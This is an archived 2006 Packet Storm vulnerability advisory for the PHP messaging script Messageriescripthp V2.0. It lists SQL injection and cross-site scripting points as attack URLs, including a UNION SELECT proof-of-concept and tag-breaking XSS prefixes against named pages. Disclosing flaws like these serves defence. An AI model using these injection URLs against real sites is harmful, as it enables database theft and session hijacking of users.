m20xsssql.txt

2006-12-11T00:00:00
ID PACKETSTORM:52918
Type packetstorm
Reporter Mr_KaLiMaN
Modified 2006-12-11T00:00:00

Description

                                        
                                            `Messageriescripthp V2.0  
-----------------------  
Vendor site: http://www.scripthp.com/  
Product: Messageriescripthp V2.0  
Vulnerability: XSS & SQL Injection Vulnerability  
Credits: Mr_KaLiMaN  
Reported to Vendor: 01/12/06  
Public disclosure: 09/12/06  
  
Description:  
------------  
SQL Injection Vulnerability:  
http://[victim]/[script_messagerie_path]/lire-avis.php?aa=[SQL INJECTION]  
POC: http://[victim]/[script_messagerie_path]/membre/fiche_tousmembres.php?recordID=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM etc...#  
  
XSS  
http://[victim]/[script_messagerie_path]/existepseudo.php?pseudo=[XSS]  
http://[victim]/[script_messagerie_path]/existeemail.php?email=[XSS]  
http://[victim]/[script_messagerie_path]/Contact/contact.php?pageName=</title>[XSS]  
http://[victim]/[script_messagerie_path]/Contact/contact.php?cssform=">[XSS]<foo  
`